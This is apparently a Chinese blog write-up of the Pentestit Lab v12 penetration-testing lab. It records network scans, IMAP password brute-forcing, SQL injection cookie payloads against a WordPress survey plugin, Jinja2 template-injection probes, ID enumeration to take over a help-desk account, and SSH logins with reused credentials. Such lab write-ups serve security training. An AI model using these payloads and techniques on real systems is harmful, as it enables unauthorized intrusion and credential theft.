对Pentestit Lab v12的测试

Pentestit Lab v12

连接方式:外国主机+openvpn(ss+openvpn是难受的)
实验目的:获取12个flag
项目地址:https://lab.pentestit.ru

1.png
登录完成
192.168.101.12 and 192.168.101.13
官方给的两个网关

192.168.101.13内网

nmap开路

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[root@cloud ~]# nmap -T4 -A -v -p- 192.168.101.12
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: SMTP: EHLO 521 5.5.1 Protocol error
80/tcp open http nginx 1.16.0
|_http-methods: No Allow or Public header in OPTIONS response (status code 403)
|_http-title: 403 Forbidden
143/tcp open imap Dovecot imapd
|_imap-capabilities: more ENABLE have AUTH=PLAIN IDLE IMAP4rev1 SASL-IR Pre-login listed AUTH=LOGINA0001 post-login LITERAL+ LOGIN-REFERRALS capabilities OK ID
8080/tcp open http nginx
|_http-methods: No Allow or Public header in OPTIONS response (status code 301)
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
|_Requested resource was http://192.168.101.12:8080/mail/

将结果保存为nmap12.xml
修改hosts

1
2
3
root@hostker:~# vim /etc/hosts
192.168.101.12 site.test.lab
root@hostker:~# elinks http://site.test.lab

80端口

2.png

1
2
root@kali:~# curl -i http://site.test.lab
<meta name="generator" content="WordPress 4.9.8" />

现在信息:
e-mail: info@test.lab
版本:WordPress 4.9.8

8080端口

1
root@hostker:~# elinks http://site.test.lab:8080

Webmail服务
3.png

25端口

开着SMTP服务器

1
2
3
4
5
6
7
root@kali:~# telnet 192.168.101.12 25
Trying 192.168.101.12...
Connected to 192.168.101.12.
Escape character is '^]'.
220 mail.test.lab ESMTP Postfix
helo test.lab
250 mail.test.lab

成功连接

143端口

1
2
3
4
5
root@kali:~# telnet 192.168.101.12 143
Trying 192.168.101.12...
Connected to 192.168.101.12.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=PLAIN AUTH=LOGIN] Dovecot ready.

可以登录

开始测试

爆破143端口

1
2
root@kali:~# brutespray -f Desktop/nmap12.xml -u info@test.lab -s imap
ACCOUNT CHECK: [imap] Host: 192.168.101.12 (1 of 1, 0 complete) User: info@test.lab (1 of 1, 0 complete) Password: 123456789 (1 of 100 complete)ACCOUNT FOUND: [imap] Host: 192.168.101.12 User: info@test.lab Password: 123456789 [SUCCESS]

拥有一个账号info@test.lab:123456789
登录8080
4.png
吐槽啊!远程主机是命令行形式,没有找到支持JavaScript的文本浏览器,还是得靠本地主机

openvpn-1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali:~/Desktop/lv12# cat open.conf
client
dev tun
proto udp
remote 192.168.101.13 1194
auth-user-pass
resolv-retry infinite
persist-key
persist-tun
comp-lzo
verb 3
**********
-----END CERTIFICATE-----
</ca>

确定是openvpn 配置
注意信息收集每一步
5.png
尝试连接

1
2
3
root@kali:~/Desktop/lv12# openvpn --config open.conf
Enter Auth Username: info@test.lab
Enter Auth Password: *********

6.png

主机测试

确定局域网存在哪些主机

1
2
3
4
5
6
7
8
root@kali:~# nmap -sn 172.16.0.0/16
Nmap scan report for 172.16.0.1
Host is up (0.37s latency).
Nmap scan report for 172.16.0.10
Host is up (0.36s latency).
Nmap scan report for 172.16.0.17
Host is up (0.38s latency).
Nmap scan report for 172.16.2.1

排除俩网关
172.16.0.10

1
2
3
root@kali:~# nmap -sC -sV 172.16.0.10
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.16.0

80端口还是那个站

1
root@kali:~# wpscan --url site.test.lab -e u --random-user-agent

还有WAF,使用随机User-Agent
7.png
确定用户admin

1
root@kali:~# wpscan --url site.test.lab -e p --random-user-agent

8.png
确定插件wp-survey-and-poll版本Version: 1.5.7.8

1
root@kali:~# searchsploit 'wordpress Survey'

9.png
根据poc得知COOKIE可注入

1
wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]

10.png
好吧!WAF
172.16.0.17

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
root@kali:~# nmap -sC -sV 172.16.0.17
Not shown: 861 closed ports, 123 filtered ports
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
| ssh-hostkey:
| 2048 52:41:88:d7:94:bb:9d:1d:db:fa:ed:ed:eb:ad:d2:15 (RSA)
|_ 256 72:92:c7:db:12:3c:16:ca:60:f8:48:ac:05:76:83:7d (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: SMTP: EHLO 521 5.5.1 Protocol error\x0D
53/tcp open domain ISC BIND 9.10.3-P4 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Debian
80/tcp open http nginx 1.16.0
|_http-server-header: nginx/1.16.0
|_http-title: 403 Forbidden
88/tcp open kerberos-sec Heimdal Kerberos (server time: 2019-08-11 12:03:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: TEST)
389/tcp open ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=AD.test.lab/organizationName=Samba Administration
| Not valid before: 2018-12-10T10:42:08
|_Not valid after: 2020-11-09T10:42:08
|_ssl-date: 2019-08-11T12:03:27+00:00; -55s from scanner time.
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: TEST)
464/tcp open kpasswd5?
636/tcp open ssl/ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=AD.test.lab/organizationName=Samba Administration
| Not valid before: 2018-12-10T10:42:08
|_Not valid after: 2020-11-09T10:42:08
|_ssl-date: 2019-08-11T12:07:21+00:00; +3m00s from scanner time.
1024/tcp open msrpc Microsoft Windows RPC
3268/tcp open ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=AD.test.lab/organizationName=Samba Administration
| Not valid before: 2018-12-10T10:42:08
|_Not valid after: 2020-11-09T10:42:08
|_ssl-date: 2019-08-11T12:04:22+00:00; -1s from scanner time.
3269/tcp open ssl/ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=AD.test.lab/organizationName=Samba Administration
| Not valid before: 2018-12-10T10:42:08
|_Not valid after: 2020-11-09T10:42:08
|_ssl-date: 2019-08-11T12:04:12+00:00; -10s from scanner time.
8080/tcp filtered http-proxy

开启53端口,查询DNS记录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# dnsrecon -d test.lab -n 172.16.0.17 -a
[*] ns1.test.lab 172.16.0.17
[*] ns2.test.lab 172.16.2.10
[*] @.test.lab 172.16.0.17
[*] db.test.lab 172.16.0.30
[*] dc.test.lab 172.16.0.17
[*] helpdesk.test.lab 172.16.0.10
[*] ns2.test.lab 172.16.2.10
[*] my.test.lab 172.16.0.10
[*] ad.test.lab 172.16.0.17
[*] site.test.lab 172.16.0.10
[*] gc._msdcs.test.lab 172.16.0.17
[*] dns.test.lab 172.16.0.17
[*] A dns.test.lab 172.16.2.10
[*] ns1.test.lab 172.16.0.17

加入本机解析(调整一下格式)
分析几个域名,在helpdesk.test.lab,发现登录窗口
11.png

**上班ing**

使用samrdump.py可以导出的系统用户帐户、可用资源共享和其他敏感信息(MSRPC服务)

1
2
3
4
5
6
7
8
9
root@kali:~# python /usr/share/doc/python-impacket/examples/samrdump.py 172.16.0.17
再稍稍加工一下
Administrator@test.lab
info@test.lab
sviridov@test.lab
sidorov@test.lab
petrov@test.lab
lomonosov@test.lab
token_fopekr0mf@test.lab

ok又出现了info@test.lab,默认密码123456789
12.png
修改密码时发现ID值,像极了BASHE64,应该每个用户都有一个唯一的id值
13.png

1
MTQ1Cg== --> 145

OK,这里有base64算法导致的坑

1
2
root@kali:~# echo 145 | base64 | sed 's/=/%3D/g'
MTQ1Cg%3D%3D

转换后就是类似这个样子
14.png
使用burp枚举id
15.png
测试完发现sviridov@test.lab,密码变成123
16.png
得到一个VPN账号sviridov@test.lab5BEiBBtrNq***************

192.168.101.12内网

修改一下ip192.168.101.12,登录VPN
上面扫描过TCP,确定端口开放在UDP上

1
2
3
root@kali:~# nmap -sU -p- 192.168.101.12
PORT STATE SERVICE
1194/udp open openvpn

1
2
3
root@kali:~# openvpn --config sviridov.conf 
Enter Auth Username: sviridov@test.lab
Enter Auth Password: *************************

17.png
继续测试域名,在my.test.lab上发现登录界面
18.png
info:123456789登陆成功
19.png

SSTI注入

在搜索框找到一个注入点SSTI注入

1
http://my.test.lab/?q={{7*7}} #使用7*7 7*'7'判断是Jinja2模板,使用tplmap自动化注入可以了解一些参数

个人记录常用测试参数

  • config 当前的配置对象
  • request 当前的请求对象
  • session 当前的会话对象
  • g 全局变量的请求绑定对象。这通常由开发人员用于在请求期间存储资源。

这里是API文档的链接:FlaskJinja
Flask / Jinja2 SSTI && python沙箱逃逸深入SSTI-从NCTF2018两道Flask看bypass新姿势
在输入config参数得到一个

1
'SECRET_KEY': '*************Wl2ZnZoei5wYnovcG5lcnJlZg=='

Phevbhf? aivfvhz.pbz/pnerref看起来像路径,但是没有命名规则,凯撒加密
20.png

1
curious ?nvisium.com/careers

然后强势一波广告https://nvisium.com/careers
在Google上发现,他的骚操作
21.png
person.secret参数可以直接得到密文,但无用
继续向前走

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# nmap -sn 172.16.0.0/16
Nmap scan report for 172.16.0.1
Host is up (0.39s latency).
Nmap scan report for ns2.test.lab (172.16.0.10)
Host is up (0.39s latency).
Nmap scan report for site.test.lab (172.16.0.14)
Host is up (0.42s latency).
Nmap scan report for ns1.test.lab (172.16.0.17)
Host is up (0.40s latency).
Nmap scan report for 172.16.1.10
Host is up (0.39s latency).
Nmap scan report for 172.16.1.12
Host is up (0.52s latency).
Nmap scan report for 172.16.1.15
Host is up (0.39s latency).

Wordpress Cookie注入

根据提示将172.16.0.14加入hosts
22.png
还是那个WordPress,继续测试cookie注入,终于出来了

1
wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,database(),11#"]

24.png
最终Payload

1
wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,convert(name,char),11 from wordpress.token #"]

得到最终密文fr5miRa****,但是无用
继续跟进。

信息搜集

对获取新的IP地址进行分析

1
2
3
4
5
6
7
8
9
root@kali:~# nmap -sV -sC 172.16.0.14
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 52:41:88:d7:94:bb:9d:1d:db:fa:ed:ed:eb:ad:d2:15 (RSA)
|_ 256 3e:ca:73:6f:6e:3c:d0:2c:69:57:78:26:a4:d6:2a:08 (ECDSA)
80/tcp open http nginx/1.14.2
|_http-generator: WordPress 4.9.8
|_http-server-header: nginx/1.14.2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~# nmap -T4 -A -v 172.16.1.10,12,15
Nmap scan report for 172.16.1.10
80/tcp open http
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3
|_http-title: Site doesnt have a title (text/html; charset=utf-8).
Nmap scan report for 172.16.1.12
22/tcp open ssh
| ssh-hostkey:
| 2048 52:41:88:d7:94:bb:9d:1d:db:fa:ed:ed:eb:ad:d2:15 (RSA)
|_ 256 3e:ca:73:6f:6e:3c:d0:2c:69:57:78:26:a4:d6:2a:08 (ECDSA)
80/tcp open http
|_http-favicon: Unknown favicon MD5: BA84999DFC070065F37A082AB0E36017
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: [PREWIKKA]
Nmap scan report for 172.16.1.15
80/tcp open http
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=closed site
|_http-server-header: nginx/1.14.2

172.16.1.10
找到密文token=fw3mij3f****
172.16.1.12
26.png
Prewikka company ltd Prelude console
能够使用sviridov 5BEiBBtrNq***************登录
翻看日志文件
28.png
发现账号
admin:IFGpajdlkmaw2of
29.png
172.16.1.15
27.png
使用admin登录
这里只是一个放文件的地方
30.png
似乎无路可走,192.168.0.0网段,还没有挖掘信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@kali:~# nmap -Pn -p21,22,80,139,445,8080 192.168.0.0/24
Nmap scan report for 192.168.0.10
Host is up (0.51s latency).
PORT STATE SERVICE
22/tcp open ssh
--
Nmap scan report for 192.168.0.30
Host is up (0.79s latency).
PORT STATE SERVICE
22/tcp open ssh
--
Nmap scan report for 192.168.0.100
Host is up (0.77s latency).
PORT STATE SERVICE
22/tcp open ssh
--
Nmap scan report for 192.168.0.205
Host is up (0.37s latency).
PORT STATE SERVICE
22/tcp open ssh
--
Nmap scan report for 192.168.0.240
Host is up (0.37s latency).
PORT STATE SERVICE
22/tcp open ssh

SSH基本都开了,使用已有用户密码尝试登陆主机
192.168.0.100使用sviridov@test.lab 5BEiBBtrNq***************登陆成功

1
2
3
root@kali:~# ssh sviridov@192.168.0.100
sviridov@lomonosov:~$ id
uid=10002(sviridov) gid=10004(domain users) groups=10004(domain users),10001(BUILTIN\users)

实验终止,提权没有没有办法操作,网络延迟太高了

总结

信息收集很重要,尝试一次又一次找到攻击向量并尝试利用他们

到此结束

如有错误请联系lanbaidetanlang@qq.com
NMAP速查表
WSPCAN速查表

文章目录
  1. 1. Pentestit Lab v12
  2. 2. 192.168.101.13内网
    1. 2.1. 80端口
    2. 2.2. 8080端口
    3. 2.3. 25端口
    4. 2.4. 143端口
    5. 2.5. 开始测试
      1. 2.5.1. openvpn-1
      2. 2.5.2. 主机测试
  3. 3. 192.168.101.12内网
    1. 3.1. SSTI注入
    2. 3.2. Wordpress Cookie注入
    3. 3.3. 信息搜集
  4. 4. 总结
  5. 5. 到此结束